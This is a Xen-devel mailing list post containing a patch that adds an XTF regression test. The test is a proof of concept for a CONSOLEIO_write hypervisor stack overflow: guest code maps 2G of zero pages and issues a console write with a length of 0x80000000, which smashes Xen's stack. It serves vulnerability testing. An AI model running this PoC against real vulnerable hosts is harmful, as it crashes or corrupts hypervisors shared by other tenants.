[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] [Xen-devel] [PATCH XTF] CONSOLEIO_write stack overflow PoC
Classify it as an XSA test (which arguably ought to be named 'security'), despite no XSA being issues. Signed-off-by: Andrew Cooper <andrew.cooper3@xxxxxxxxxx> --- docs/all-tests.dox | 2 ++ tests/xsa-consoleio-write/Makefile | 9 +++++ tests/xsa-consoleio-write/main.c | 69 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 80 insertions(+) create mode 100644 tests/xsa-consoleio-write/Makefile create mode 100644 tests/xsa-consoleio-write/main.c diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 50429127..bcf9b7ed 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -143,6 +143,8 @@ XSA-293 - See @ref test-pv-fsgsbase. @subpage test-xsa-298 - missing descriptor table limit checking in x86 PV emulation. +@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow + @section index-utility Utilities diff --git a/tests/xsa-consoleio-write/Makefile b/tests/xsa-consoleio-write/Makefile new file mode 100644 index 00000000..d189b4de --- /dev/null +++ b/tests/xsa-consoleio-write/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-consoleio-write +CATEGORY := xsa +TEST-ENVS := hvm32pae + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-consoleio-write/main.c b/tests/xsa-consoleio-write/main.c new file mode 100644 index 00000000..f10a6256 --- /dev/null +++ b/tests/xsa-consoleio-write/main.c @@ -0,0 +1,69 @@ +/** + * @file tests/xsa-consoleio-write/main.c + * @ref test-xsa-consoleio-write + * + * This issue was discovered before it made it into any released version of + * Xen. Therefore, no XSA or CVE was issued. + * + * A bugfix in Xen 4.13 altered CONSOLEIO_write to tolerate passing NUL + * characters intact, as this is a requirement for various TTY setups. + * + * A signed-ness issue with the length calculation lead to a case where Xen + * will copy between 2 and 4G of guest provided data into a 128 byte object on + * the stack. + * + * @see tests/xsa-consoleio-write/main.c + */ +#include <xtf.h> + +const char test_title[] = "CONSOLEIO_write stack overflow PoC"; + +uint8_t zero_page[PAGE_SIZE] __page_aligned_bss; + +/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. */ +asm (".section \".data.page_aligned\", \"aw\";" + ".align 4096;" + + "l1t:" + ".rept 512;" + ".long zero_page + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l1t, . - l1t;" + ".type l1t, @object;" + + "l2t:" + ".rept 512;" + ".long l1t + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l2t, . - l2t;" + ".type l2t, @object;" + + ".previous;" + ); +extern intpte_t l2t[512]; + +void test_main(void) +{ + /* Map 2G worth of zero_page[] starting from 1G... */ + pae_l3_identmap[1] = pae_l3_identmap[2] = pte_from_virt(l2t, PF_SYM(AD, P)); + + /* + * ... , write those zeros with a length possible to be confused by a + * signed bounds check... + */ + hypercall_console_write(_p(GB(1)), 0x80000000); + + /* ... and if Xen is still alive, it didn't trample over its own stack. */ + + xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow\n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */ -- 2.11.0 _______________________________________________ Xen-devel mailing list Xen-devel@xxxxxxxxxxxxxxxxxxxx https://lists.xenproject.org/mailman/listinfo/xen-devel
|
Lists.xenproject.org is hosted with RackSpace, monitoring our |